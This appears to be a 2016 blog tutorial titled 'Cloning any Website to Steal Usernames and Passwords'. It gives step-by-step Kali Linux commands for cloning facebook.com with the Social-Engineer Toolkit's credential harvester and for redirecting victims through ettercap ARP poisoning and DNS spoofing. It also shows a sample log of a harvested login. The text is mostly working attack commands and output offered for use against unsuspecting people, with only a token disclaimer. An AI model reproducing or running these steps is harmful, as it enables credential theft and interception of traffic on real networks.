Thursday, 28 July 2016

Cloning websites

Cloning any Website to Steal Usernames and Passwords

This is a tutorial on how to create a fake phishing page to steal username and password and force redirect Our victim when browsing to www.anysite.com to Our fake phishing site.
Summary: We will create a fake clone of facebook.com and add a harvesting function. We will then configure a DNS SPOOF that will force Our victim to redirect to Our fake page when trying to navigate to www.facebook.com. When Our victim types in the username and password, the credentials will then be sent to a file on Our machine as well as we redirect Our victim With its credentials to facebook resulting in a sucsessfull login for Our victim not to Wake any suspicion.

  • Requirements:
    • Kali Linux
    • Social-Engineering Toolkit (inkluded in kali)
    • Apache webserver (included in kali)
Basicly we just need Kali Linux. 
Boot up kali Linux and open up a New terminal.
Start by typing #Ifconfig to see you IP and you will get something like this:
root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:39:29:6d
          inet addr:192.168.0.119  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe39:296d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:426547 errors:0 dropped:0 overruns:0 frame:0
          TX packets:307727 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:413710801 (394.5 MiB)  TX bytes:44428418 (42.3 MiB)
Now that we got Our IP we gonna set up the fake facebook page and add a harvesting function to it usingSetoolkit
you can start set using a terminal in kali and type in #Setoolkit like shown bellow:
root@kali:~# setoolkit
[-] New set_config.py file generated on: 2015-09-13 12:49:59.108423
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2015-09-13 12:49:59.108423
[*] SET is using the new config, no need to restart

           ..######..########.########
           .##....##.##..........##...
           .##.......##..........##...
           ..######..######......##...
           .......##.##..........##...
           .##....##.##..........##...
           ..######..########....##...

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 
Now go to: Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack Method -> Site Cloner
Now it will ask for Your IP and then the link to clone like this:
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.0.119
USAGE ON WAN: To be able to use this attack on WAN and prank Your friend, With “permission” you need to port forward to port :80 on Your router!
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com
NB: it may ask you to start Apache if its not already running. just press “Y” for yes.
Apache is the Application that functions as a webserver where the phishing site will run on.
Thats it. We have the fake facebook page running on Apache port :80 With the harvesting function wich will steal the username and password when the victim vist/logon to Our phishing site.
Now… Since we are lazy and don’t wanna force Our victim to go to this link http://192.168.0.119 we are just gonna force them to redirect to Our fake facebook page whenever they try to visit facebook.com.
All Our webfiles is in the Directory: /var/www
Heres how we force them to whatever website we want.
WARNING: DNS SPOOFING will force the victim to the site of Your choise. Hacking Defiended Experts do not take any responsibility if Your intentions are bad. This is a powerfull tool and the victim will most likeley not be able to reject nor stop this attack.
First we need to allow port porwarding on incomming connections. To do that we need to type:
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
Now we need to edit a config file to tell where to forward the connections. The config file is located under /etc/ettercap/etter.dns
to edit this file type:
root@kali:~# nano /etc/ettercap/etter.dns
That will open up the etter.dns in the nano text editor
CHANGE THIS BLOCK BELLOW FROM THIS
################################

microsoft.com      A   107.170.40.56
*.microsoft.com    A   107.170.40.56
www.microsoft.com  PTR 107.170.40.56      # Wildcards in PTR are not allowed

TO THIS:

facebook.com      A   192.168.0.119
*.facebook.com    A   192.168.0.119
www.facebook.com  PTR 192.168.0.119      # Wildcards in PTR are not allowed

##########################################
USE CTRL+O TO SAVE & USE CTRL+X TO EXIT
Now the final step!
Use this command to activate DNS SPOOF
NOTE: My Interface is eth0, be sure to set the right Interface. you can find this by typing #ifconfig
root@kali:~# ettercap -Tqi eth0 -P dns_spoof -M arp /// ///
when Your victim visits facebook.com this is what you will see in the terminal:
dns_spoof: A [facebook.com] spoofed to [192.168.0.119]
When the user logs in he or she will be redirected to the real facebook with a secsessfull login.
Here is a screenshot of my Microsoft Edge browser in Windows 10. PS: I forgot to change Microsoft to facebook in etter.dns but you get the point. The current Language in my vbrowser is set to Norwegian so thats what I’ll get as output as well.
fake facebook
To see the username and password open up the Harvester file located in /var/www/Harvester.txt
This is what you’ll see!
Array
(
    [lsd] => AVouXPnt
    [display] =>
    [enable_profile_selector] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [trynum] => 1
    [timezone] => -240
    [lgndim] => eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNDAsImMiOjI0fQ==
    [lgnrnd] => 103735_LJMl
    [lgnjs] => 1442172541
    [email] => HDE-Tutorial
        [pass] => Shittypassword
    [default_persistent] => 0
    [qsstamp] => W1tbMCwxMCwyMiwzMCwzNiw0Myw0Niw4OCwxMzYsMTU3LDE2NCwxNzMsMTg2LD$
)

Have fun and enjoy…. Be carefull!

No comments:

Post a Comment